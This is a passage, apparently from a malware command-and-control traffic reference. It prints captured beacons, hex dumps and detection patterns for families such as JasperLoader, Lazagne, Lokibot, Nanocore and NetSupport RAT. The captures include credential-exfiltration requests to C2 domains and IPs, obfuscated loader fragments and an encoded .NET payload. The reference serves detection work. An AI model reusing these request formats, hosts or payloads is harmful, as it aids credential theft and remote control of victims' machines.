application/x-www-form-urlencoded Host: max099801.000webhostapp.com Content-Length: 936413 Expect: 100-continue Connection: Keep-Alive zipx=UEsDBBQAAAgIALOmj ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/idex-new.png "iDex New") #### Imminent RAT ~~~ 00000000 06 00 00 00 81 13 14 6e 5b 69 .......n [i ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/imminent-1.png "Imminent") ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/imminent-2.png "Imminent") #### ISRStealer ~~~ GET /boss/index.php?action=add&username=honey@pot.com&password=honeypass356&app=Opera&pcname=USER-PC&sitename=https://www.facebook.com HTTP/1.1 User-Agent: HardCore Software For : Public Host: expressdeliveryfx.com Cookie: PHPSESSID=ni2v6p8vt6p48qcvm48rj7qqt0 HTTP/1.1 200 OK Connection: Keep-Alive X-Powered-By: PHP/5.6.40 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Length: 0 Date: Tue, 08 Oct 2019 14:06:15 GMT Server: LiteSpeed ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/isrstealer.png "ISRStealer") #### JasperLoader ~~~ GET /?b=USER-PC_DELL_30fbefd6&os=6.1.7601.17514&v=327.2&psver=2 HTTP/1.1 Host: green.datota.it Connection: Keep-Alive HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Thu, 28 Mar 2019 17:41:51 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 115 Connection: keep-alive X-Powered-By: PHP/5.4.16 u|http://red.greenmira.com/cryptbody2.php|http://red.greenmira.com/loadercrypt_823EF8A810513A4071485C36DDAD4CC3.php ~~~ ~~~ GET /cryptbody2.php?b=USER-PC_DELL_30fbefd6&os=6.1.7601.17514&v=327.2&psver=2 HTTP/1.1 Host: red.greenmira.com Connection: Keep-Alive HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Thu, 28 Mar 2019 17:41:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/5.4.16 t6i3jf5s(h6 ac(wtGite5ite0-bdUsaI53Cwfu52ls4tf6u0eryze76)3x.ccNi3af5mtdex4 6y-76m4da05tu1cijhzw jz'02RdtU7i|v2UjsAzu|86BcxYtz|0gCehNuh'hw 4a-ixo07rwg 9v(tcGh3exdtai-bwWa7m7sixdOyibybjxfe6zcxdtja cj-86cjdls1awisu3s7b c1W35i3dn1s36z2iz_hgCvuo36m3aphxucyt6je9ersbShuyxxsxittfeyhm5y xc-8vP5arw5o17pujed4r44t1iyhu i4Mfsowedude2vlie)0a.cdMt6ovtdybe6xl09 bs-xumu1ah8tefc94ht3 8x'3iV87Mftwvya20r74ej8'3h ac)3x{w7 ydeyaxueijjtus;sg 6w}zw e2 ezFavu0vnavc66tztiv2owhnx9 yeChzr9cecja02ty3eu6Suvh7uo42rc3tg9ci9u49tdu(1j 2z$f7lvbngfk0y,a4 7c$etAehrfegz5uzbm98eyhnaft7zsf4,fc zz$efW2johbr28kihihfnvcga5Divijar2sezyc9ithxog6rxty39 1f)t1{eb vv yw 5bt3wrt1ytu{ai cc 01 wb tz b9$41Sz9hbheacly2l64 us=sh gbNz ~~~ ~~~ GET /loadercrypt_823EF8A810513A4071485C36DDAD4CC3.php?b=USER-PC_DELL_30fbefd6&os=6.1.7601.17514&v=327.2&psver=2 HTTP/1.1 Host: red.greenmira.com HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Thu, 28 Mar 2019 17:41:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/5.4.16 vtyzhsjuxvzxhbgfsdzdzzb = " "; ibcvwj = new Array(); ibcvwj.push("iavSxyfERDVE(t8E8a974CDQ6y"); ibcvwj.push(""); ibcvwj.push("885tSDCB4aw"); ibcvwj.push("wR6EREzW>CzEz54zRy361wRDt97y"); ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/jasperloader.png "JasperLoader") #### JsOutProx ~~~ POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-Form-urlencoded; Charset=UTF-8 Accept: */* Accept-Encoding: gzip, deflate Cookie: _uot=43344241333634375f7c5f38396139633066382d393535362d346339662d626363642d6330373464646331346230395f7c5f555345522d50435f7c5f61646d696e5f7c5f4d6963726f736f66742057696e646f777320372050726f66657373696f6e616c205f7c5f362e312e373630315f7c5f4a734f757450726f785f7c5f70696e67 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:70.0) Gecko/20100101 Firefox/70.0 Content-Length: 0 Host: 91.189.180.199:9989 HTTP/1.1 200 OK Content-Type: image/jpeg Set-Cookie: _utl=73646e5f7c5f Content-Length: 20164 Connection: close AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkDAAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBlTmFtZQptZXRob2ROYW ~~~ Hex decoded cookie example from above: ~~~ C4BA3647_|_89a9c0f8-9556-4c9f-bccd-c074ddc14b09_|_USER-PC_|_admin_|_Microsoft Windows 7 Professional _|_6.1.7601_|_JsOutProx_|_ping ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/jsoutprox.png "JsOutProx") #### JSSLoader ~~~ POST /gate.php?bot_id=JenniferPCJENNIFERPCVMware564db87746ebb934e9e0b94b413682b8 HTTP/1.1 Content-Type: application/json Host: dempoloka.com Content-Length: 242 Expect: 100-continue Connection: Keep-Alive AAAAAA== AQAAAA== VGhlIGlucHV0IGlzIG5vdCBhIHZhbGlkIEJhc2UtNjQgc3RyaW5nIGFzIGl0IGNvbnRhaW5zIGEgbm9uLWJhc2UgNjQgY2hhcmFjdGVyLCBtb3JlIHRoYW4gdHdvIHBhZGRpbmcgY2hhcmFjdGVycywgb3IgYW4gaWxsZWdhbCBjaGFyYWN0ZXIgYW1vbmcgdGhlIHBhZGRpbmcgY2hhcmFjdGVycy4g ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/jssloader.png "JSSLoader") #### Keybase ~~~ GET /panel/post.php?type=passwords&machinename=USER-PC&application=MS%20Outlook%202002/2003/2007/2010&link=192.168.1.1&username=honey@pot.com&password=honeypass356 HTTP/1.1 Host: pacificglobal.ga Connection: Keep-Alive HTTP/1.1 200 OK Server: nginx Date: Fri, 04 Oct 2019 19:55:10 GMT Content-Type: text/html Content-Length: 985 Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/keybase.png "Keybase") #### Koadic ~~~ POST /html?CRADZPYFZ4=825b2f6bafed407c88254aa1e804be93;9Q90FBZM0Q=; HTTP/1.1 Connection: Keep-Alive Content-Type: application/octet-stream Accept: */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) encoder: 1252 shellchcp: 437 Content-Length: 140 Host: googlechromeupdater.twilightparadox.com:448 USER-PC\admin~~~USER-PC~~~Windows 7 Professional***7601~~~Unknown~~~x86~~~C:\Users\admin\AppData\Local\Temp ~~~192.168.100.159~~~1252~~~437 HTTP/1.0 200 OK Server: Apache Date: Wed, 22 Jan 2020 16:29:00 GMT ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/koadic.png "Koadic") #### Kpot stealer Follow tcp stream, not http stream in wireshark ~~~ GET /ImgcsQGM6ZclLvqr/conf.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Host: allseasongudinc.tech HTTP/1.1 200 OK Server: nginx Date: Tue, 27 Aug 2019 13:52:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.1.28 194 KwV4X3wlPk10s8hXH869gjRybIA8vP7vCwSm1Z2WW5LpEMiELVOQvustrfDp9B9igx9Jz8+noWaPlvipqvlX1nEJsgEGpkK29iHNRB5rmSyH9hPAko1ndCVOfVjGwUO/THlWJSdlDlb0FyJA2+ji7xH/Hlcwx38AIJ1SHUpp+hYHUnavdTv5uJnIAoB23+3dt7f1I54mr2Pp+eddWPHgFeIL/2BeLqaWQL1IzY1EqZhS9oIluDYmojSWgWeu6mecE5suxDRksh0KOyA7518HX4ziYflt6gBOa+daqP42C7K7PspsZGUMTRIRKayAQIT84HYmE7a/jRK1twsOz8gdJIrbaOTLaZWx/4q3Nd8bAB2yH8PvCwRz2YVsmzjBv93n3ksOHYuFtO1GcnOk0Igj 0 POST /ImgcsQGM6ZclLvqr/conf.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/octet-stream Content-Encoding: binary Host: allseasongudinc.tech Content-Length: 1965022 P@F,jbhNH2pUP_s..tzH W-.z.Cb]_u.PBCy9bhNH2pUdoG4PBCy9bhNH2pUdo.r...<|XH :S.7...U 2'.M.4.!Q.:..!@..*.] .=.q.:.."G..,.eP+...I.%A3L$OI4l+,.B.@.R+rqh{w@.TP.p.5`]+~ .{vA TQ.y8.% A%]>%m.V.GDq.Acn]v.b{vK.U^D{.GbTVs.ZqsO.[]xx.I_W_q.ir{H3Hbn.t6.-#.q...?p.-.r.7'. %Q"." I. :)n=<..(G?$7%n..*'E. '.(_9'0%u ..qcE.1;.b~6; 4h;..z4_%)z}...Mxh '&U^6..h>arqM3T[vy.Fmn\w.c{vM.h[~~.I`R_t ZqsO.[Xvy8Z_7=.|...so_Zh.g9.YZv.`..HxS+ }.3.S-u..tw8z![~xq6a&I#Y>!+..Sb,!\.{..*.ZssK h^}p.Ec\et.hqzL Pb}x.FlQYw.iHpI.UQ~p.z.n<.w...+3&'.u.@d\_~.eH!.W.F-'___U_u.ZtpA.W^vB.@mWVr.bHpI.TQ{~.Cln\w.g{sA.hBDhm6."&.q...?.+$. .P...%V50..I../ ;.qSZ#7.T.F-'___V^s.d{qA.Vb}~.IgRYv.fHpI.SX{q.zfVZv.hpuI.h[~~.Ie\^M.Z..73SF.}.GmQ_s.`lrI.RZw{.Fd\\s.gsqL.ZF..x$$U#.ea.".W.<-x.z4..*@~!,..hZ.|.DlVWq.ZqtO.U_{{.@_W_..iqwI3QZ{x.Hm\Zu>cruN.RP.B.zu;).r... >8V.!.3 ]30, V....[.1..4h.-,.P....]. /;.b...N...:E8.4..Me";3..Q.}0m .>)&A.'9.P6'D.S.0..(_~!,..hQ|y.zfR^~.gwpO h[~p.IfP_M.arwL.QZ| ~~~ ~~~ GET /admtest/configuration.php?botid=BEF522C314BC1291311131 HTTP/1.1 Host: 213.226.100.184 Connection: Keep-Alive Cache-Control: no-cache HTTP/1.1 200 OK Server: nginx/1.10.3 (Ubuntu) Date: Mon, 13 Jul 2020 08:26:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/kpot.png "Kpot stealer") ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/kpot2.png "Kpot stealer") #### KrugBot ~~~ POST /absc/index.php HTTP/1.0 Host: raiseyourdongers.wtf User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Content-Type: application/x-www-form-urlencoded Content-Length: 224 tSVkhHUFWeXjujTxCNBQl7h1QW2zElMRx+g8ceDNF/4mUj4PV8MaCjFjhqCGYGprTPLjXu5i w+xWBGqDB44jDCJcr66AgCqhZYhj04B5PCPqMNaf8It2IfuX9Ffysaqp+tjcUhGW3JH1nJk8 ud1kko0C6+v/tp2PLOVR0ac3GacRi0dUf/+ASue6AJNOfh4WliURnubviRXJkcj+5f7vA3Xa jg== ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/krugbot.png "Krugbot") #### Krypton Stealer ~~~ POST /connect_meta.php HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Client Host: orl05511cn.temp.swtest.ru Content-Length: 26 Cache-Control: no-cache id=01&message=test_message ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/krypton.png "KryptonStealer") #### Lazagne ~~~ POST /te.php HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------58748130728276 User-Agent: Mozilla/5.0 Gecko/20100115 Firefox/3.6 Host: 185.86.148.123 Content-Length: 1526 Cache-Control: no-cache -----------------------------58748130728276 Content-Disposition: form-data; name="userfile"; filename="admin-USER-PC-passwords.txt" Content-Type:application/x-gzip ########## User: admin ########## ------------------- Firefox passwords ----------------- [+] Password found !!! URL: https://m.facebook.com Login: honey@pot.com Password: honeypass356 ------------------- Outlook passwords ----------------- [-] Password not found !!! Account Name: honey@pot.com. POP3 User: honey@pot.com. POP3 Server: 192.168.1.1. u'Delivery Store EntryID: \x00\x00\ua138\u10bb\ue505\u1a10\ubba1\x08\u2a2b\uc256\x00\u736d\u7370\u2e74\u6c64l\x00\x00\u494e\u4154\ubff9\u01b8\uaa00\u3700\u6ed9\x00\x00C:\\Users\\admin\\Documents\\Outlook Files\\honey@pot.com.pst\x00' SMTP Secure Connection: 0 SMTP Server: 192.168.1.1. Mini UID: 224868084 'Delivery Folder EntryID: \x00\x00\x00\x00\x81 \xa1\x9f\x92\x06>N\x9c\xc7t\xd9H\xba>f\x82\x80\x00\x00' u'clsid: \u457b\u3444\u3537\u3134\u2d31\u3042\u3644\u312d\u4431\u2d32\u4338\u4233\u302d\u3130\u3430\u3242\u3641\u3736\u7d36' Display Name: HoneyPot Mail. POP3 Password: honeypass356. Email: honey@pot.com. u'Leave on Server: \u3139\u3537\u3730' ------------------- Google chrome passwords ----------------- [+] Password found !!! URL: Login: honey@pot.com Password: honeypass356 [+] 3 passwords have been found. For more information launch it again with the -v option elapsed time = 0.84299993515 -----------------------------58748130728276-- HTTP/1.1 200 OK Date: Tue, 29 Oct 2019 21:10:11 GMT Server: Apache/2.4.18 (Ubuntu) Content-Length: 1 Content-Type: text/html; charset=UTF-8 ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/lazagne.png "Lazagne") #### Loda I've never seen this without the beta flah ~~~ x|lugocv|x|admin|WIN_7|X86| |Disabled|1.1.2|ddd|Pr720X21280X3|Desktop|0|beta ZeXro0 ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/loda.png "Loda") #### Lokibot follw tcp stream, not http stream in wireshark ~~~ POST /sky/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: fueda.info Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 8DAA705A Content-Length: 176 Connection: close ..'.......ckav.ru.. ...a.d.m.i.n.......U.S.E.R.-.P.C.......U.S.E.R.-.P.C......................+................0...8.5.6.9.A.A.F.F.6.3.A.A.A.7.1.D.8.0.4.0.0.E.2.5.....Rqbay.... ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/lokibot.png "Lokibot") #### Metamorpho/Metamorfo BR Banker ~~~ POST / HTTP/1.0 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 249 Host: 18.217.112.176 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: identity User-Agent: Mozilla/3.0 (compatible; Indy Library) spxndja=HERETEVFDEVFJERERFEERFFEXERFJFGFKER&kfcemfgj=CCO&gvtsavp=EFMFM&ixjpblda=HEDEEDOEGDODXCPDKDMDMDYEFDXEEDSCMEHFAFFCCDACMCTCSCMDCCXCQCSDUDLCMCMDOFFEXFDFAFKEYCCCKEFFFFAFLEVEUCCEDFLERFLEVFKCLCMCMEHFAFFEUFGFOFKCCDNEVEWEVFFEUEVFJCMCYCWDLCM&xhwen=YDL HTTP/1.1 200 OK Date: Fri, 19 Jul 2019 15:18:12 GMT Server: Apache/2.4.18 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 HTTP/1.1 200 OK Date: Fri, 19 Jul 2019 15:18:12 GMT Server: Apache/2.4.18 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 ~~~ ~~~ POST /hooponopono/puma.php HTTP/1.0 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 158 Host: leavenois.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/3.0 (compatible; Indy Library) vv=OP22--22-10&vw=&mods=&uname=VVNFUi1QQw%3D%3D&cname=Ti05Ng%3D%3D&os=V2luZG93cyA3IFByb2Zlc3Npb25hbDYuMTc2MDEtNjQ%3D&is=&iss=SUUuQXNzb2NGaWxlLkhUTQ%3D%3D&iav= HTTP/1.0 200 OK Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 0 Date: Tue, 22 Oct 2019 20:06:32 GMT Server: LiteSpeed ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/metamorpho.png "Metamorpho") ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/metamorfo-1.png "Metamorpho") #### Micropsia ~~~ POST /api/white_walkers/new HTTP/1.1 Connection: KeepAlive Content-Type: multipart/form-data; boundary=--------121819110609549 Content-Length: 818 Cache-control: no-store Host: accountforuser.website Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) ----------121819110609549 Content-Disposition: form-data; name="daenerys" Content-Type: text/plain; charset="utf-8" Content-Transfer-Encoding: 8bit SkVOTklGRVItUENfSmVubmlmZXJfNUZ0MzNidWxETUMybzVG ----------121819110609549 Content-Disposition: form-data; name="betriebssystem" Content-Type: text/plain; charset="utf-8" Content-Transfer-Encoding: 8bit Windows 7 Service Pack 1 (Version 6.1, Build 7601, 64-bit Edition) ----------121819110609549 Content-Disposition: form-data; name="anwendung" Content-Type: text/plain; charset="utf-8" Content-Transfer-Encoding: 8bit ExecuteLibrary.exe v2.0.0 ----------121819110609549 Content-Disposition: form-data; name="AV" Content-Type: text/plain; charset="utf-8" Content-Transfer-Encoding: 8bit No Instance(s) Available. ----------121819110609549-- ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/micropsia.png "Micropsia") #### MilkyBoy ~~~ POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded User-Agent: Adzq41ceq52e353512hSfj Content-Length: 45 Host: qqwveqwevqwe.duckdns.org:10 key:Adz32151295uy129v5nqwrnvqwkjn5rv12n5vhSfj HTTP/1.0 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 8593928 Server: Werkzeug/0.15.4 Python/2.7.6 Date: Wed, 09 Oct 2019 22:09:57 GMT TVqQAAMAAAAEAAAA/ POST / HTTP/1.1 Host: qqwveqwevqwe.duckdns.org:10 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: python-requests/2.11.1 key: Adz32516047vhSfj filename: 58759853857.zip Content-Length: 5334 Content-Type: multipart/form-data; boundary=80790cc2554f462cb375dcc301f5c66a --80790cc2554f462cb375dcc301f5c66a Content-Disposition: form-data; name="payload"; filename="payload" PK........G.IO............ ...PASSWORDS/PK........G.IO+&.6v...........e.txt=.I.. .....Wx./X....%......g[VN6A...z~......x}....xH......*b....<@.W.P..X......,|*.]$.. }..%. .C{....7.W......Bas.....PK........I.IO................sys.txt].Ok.@....|..S...&jho.B..........R.[.OK(..].K.2.7.73o~...'..6D.>q....U..u.. .W..x.0....=.T.#...<0"....W.k.. .;..J1.q;X.{kz..S;_.f.t...D..Gh@......Q.v@G=}....m"...............Yy..!1U...i.xe...B.T%.. {5.....m...3.>....3.J..]Vh......&Y.@.8...T~1B!....l kk.:......m$....B.._.E........PK........G.IO................PASSWORDS/CBase/PK........G.IO................PASSWORDS/FBase/PK........G.IO................PASSWORDS/CBase/Google/PK........G.IO).L ........#...PASSWORDS/CBase/Google/cookies.json....PK........G.IO".......[...)...PASSWORDS/CBase/Google/loginpasswords.txt...=..r.. -N-*.IL....q,(pI,I...ON..q..O.I.q.(..M..S.....%....U.g...x...Z.sy...2......(X).r....... .d...V:....%...r.$.......d@|cS3...PK........G.IO."{.o...C..."...PASSWORDS/CBase/Google/webdata.txt...=..r.. -N-*.IL....q,(pI,I...ON..q..O.I.q.(..M..S.....%......&..x...V.cy..2..K..sS.....2Ss@..\>.P........b.0.PK........G.IO................PASSWORDS/FBase/Mozilla/PK........G.IOp.0.$.......$...PASSWORDS/FBase/Mozilla/cookies.json..Mk.@.....!......$......Vl$..~.......-..j-...R/s.y..}.....8..q.zm.[..n.~U..e).z..7.7.............. ...^z.6..t#....(@W.r43...U.iT.-.....%6.....1......}5......iG..Ut.i|".I....$...~...Q.yr_.....tA.".. @.p...',.!O!e..T.v.6..T.hEY*..H..Sq)....L......~...CD....E.0..Sa.T ..`b.J*i...G..."xpF.......PK........o.)M0..W............PASSWORDS/FBase ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/milkyboy-1.png "Milkyboy 1") ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/milkyboy-2.png "Milkyboy 2") #### MirageFox ~~~ POST http://172.16.100.1/result%3Fhl%3Den%26meta%3Dghumeaylnlfdxfircvscxggbwkfnqdu HTTP/1.0 Accept: *.* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) Proxy-Connection: Keep-Alive Content-Length: 528 Encoding: gzip, deflate Accept-Language: en-us Host: 172.16.100.1 ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/miragefox.png "MirageFox") #### Nanocore flag on "38 00 00 00 17" pattern ~~~ 00000000 38 00 00 00 17 f5 4b 2c c3 65 ca 9f eb bc fd 67 8.....K, .e.....g 00000010 ad 6d 0e c4 33 7d b6 40 17 17 97 a1 d9 7c 3c b3 .m..3}.@ .....|<. 00000020 04 ea d0 16 f2 cf 3e 51 29 18 55 e5 1c 7a 6a 91 ......>Q ).U..zj. 00000030 03 99 38 f7 ac 3b f7 89 85 2e c4 d8 ..8..;.. .... ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/nanocore-38.png "Nanocore 38") flag on "40 00 00 00 17" pattern: ~~~ 00000000 40 00 00 00 17 f5 4b 2c c3 65 ca 9f eb bc fd 67 @.....K, .e.....g 00000010 ad 6d 0e c4 33 7d b6 40 17 17 97 a1 d9 7c 3c b3 .m..3}.@ .....|<. 00000020 04 ea d0 16 87 30 8f fa 78 9d 2a 01 c2 51 ee 07 .....0.. x.*..Q.. 00000030 bd e7 23 95 3e ab a1 04 ca 56 b3 fb b7 9b b7 3a ..#.>... .V.....: 00000040 13 e5 2b 52 ..+R ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/nanocore-40.png "Nanocore 40") flag on "50 00 00 00 82" pattern: ~~~ 00000000 50 00 00 00 82 c8 36 7a 87 1b 91 70 6b 20 7f 17 P.....6z ...pk .. 00000010 ea 86 3a e9 07 fc 40 ae 0f ac bc f5 f2 6d f3 98 ..:...@. .....m.. 00000020 71 7a 0b 19 4c 8e 58 bb 6c 69 5a 99 55 4a 72 c6 qz..L.X. liZ.UJr. 00000030 92 ed 39 fe 74 2a 9d b4 09 ca 5a 4a 83 dc 99 16 ..9.t*.. ..ZJ.... 00000040 0a ea 28 ad ba f6 87 d0 b7 4d 45 78 6a 71 84 19 ..(..... .MExjq.. 00000050 34 cc c6 79 4..y ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/nanocore-50.png "Nanocore 50") #### NetSupport RAT ~~~ POST http://179.43.159.246/fakeurl.htm HTTP/1.1 User-Agent: NetSupport Manager/1.3 Content-Type: application/x-www-form-urlencoded Content-Length: 22 Host: 179.43.159.246 Connection: Keep-Alive CMD=POLL INFO=1 ACK=1 HTTP/1.1 200 OK Server: NetSupport Gateway/1.6 (Windows NT) Content-Type: application/x-www-form-urlencoded Content-Length: 60 Connection: Keep-Alive CMD=ENCD ES=1 DATA=.g+$.{.. \....W...bb...).w}..o..X..xf... POST http://179.43.159.246/fakeurl.htm HTTP/1.1 User-Agent: NetSupport Manager/1.3 Content-Type: application/x-www-form-urlencoded Content-Length: 232 Host: 179.43.159.246 Connection: Keep-Alive CMD=ENCD ES=1 DATA=u.2h.r..4.]..%y-.....=I...D3.W..i.7?....=@....F.f....&t.[..6ra..L.....?....>......5T.m.<..O....a.g.qwjW..I{~i...1......\.bH8Z&8.|gY@:......7. .\.(.K(...oC.x.m-.o.D.t....Lv...{.............=J.J...f.V=@.`t..i...... POST http://179.43.159.246/fakeurl.htm HTTP/1.1 User-Agent: NetSupport Manager/1.3 Content-Type: application/x-www-form-urlencoded Content-Length: 77 Host: 179.43.159.246 Connection: Keep-Alive CMD=ENCD ES=1 DATA=l3.<(T{.E.....V....k.9|||$(m..$C.M..=I0`!.....^.....?sq. ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/netsupport.png "NetSupport RAT") #### Netwire flag on "41 00 00 00 99" pattern in initial packet ~~~ 00000000 41 00 00 00 99 80 3a e0 e8 5f d7 ea 8c af 76 cc A.....:. ._....v. 00000010 c4 cc ad 5a 10 72 cc d0 5e 64 d8 50 80 fc b6 e6 ...Z.r.. ^d.P.... 00000020 54 25 bf e0 ea 7f 7b e4 ff 54 70 e8 eb c0 fa 80 T%....{. .Tp..... 00000030 a0 a0 f3 a0 b0 0a 94 04 84 31 7c 3f e7 8c 90 c5 ........ .1|?.... 00000040 ce c4 11 97 d9 ..... ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/netwire.png "Netwire 40") #### Neutrino ~~~ POST /panel/52/tasks.php HTTP/1.0 Host: slipcentral.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0 Content-type: application/x-www-form-urlencoded Cookie: auth=bc00595440e801f8a5d2a2ad13b9791b Content-length: 180 _wv=Y21kJjkwMDU5YzM3LTEzMjAtNDFhNC1iNThkLTJiNzVhOTg1MGQyZiZZV1J0YVc0Z09pQlZVMFZTTFZCRElEb2dWVk5GVWkxUVF3JTNEJTNEJldpbmRvd3MlMjA3JTIwKDMyLWJpdCkmMCZOJTJGQSY1LjEmMDguMTAuMjAxOSZOT05FHTTP/1.0 404 Not Found Connection: close X-Powered-By: PHP/5.6.40 Content-Type: text/html; charset=UTF-8 Content-Length: 1251 Date: Tue, 08 Oct 2019 00:52:53 GMT Server: LiteSpeed Vary: User-Agent 404 Not Found

Not Found

The requested URL /panel/52/tasks.php was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/neutrino.png "Neutrino") #### Nukesped ~~~ POST /list.php?v=1530 HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=FE4149CA-3412-4743-9789-F6C0D0371C4F User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Length: 385 Host: lastedforcast.com --FE4149CA-3412-4743-9789-F6C0D0371C4F Content-Disposition: form-data; name="_media_1" 15868 --FE4149CA-3412-4743-9789-F6C0D0371C4F Content-Disposition: form-data; name="_media_2" 16 --FE4149CA-3412-4743-9789-F6C0D0371C4F Content-Disposition: form-data; name="file"; filename="Sy2LbbDxqF1W.img" Content-Type: octet-stream --FE4149CA-3412-4743-9789-F6C0D0371C4F-- HTTP/1.1 200 OK Date: Fri, 12 Jun 2020 03:32:37 GMT Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.2.31 X-Powered-By: PHP/7.2.31 Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 0 ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/nukesped.png "Nukesped") #### Orcus RAT Machine name is SNI ~~~ ....j...f..].....*".....L...^...xG.F..... ...../.5... ..... . .2.8.......%.......... ...USER-PC. ......................M..]......~$....q.....d..o..t{8Y..& V5.....Xj..[...d.'v...3Y..9...}.....................0...0..0.......GY.I..l.C.!d.((n0 . *.H.. .....0!1.0...U....OrcusServerCertificate0 . 181004205345Z..20691004205345Z0!1.0...U....OrcusServerCertificate0..0 . *.H.. .........0..........C.}q. .%/.J..U..+U!...Zk.&5.". .on......w..NA..n..... ...ZM!...g..]....]Z..., ~h..?.......i'........u..... .r.|.o....2..A1KU.....0 . *.H.. ...........}.#zu....*...eW.+..c8..qk^.8....F..S"u.:..=...C 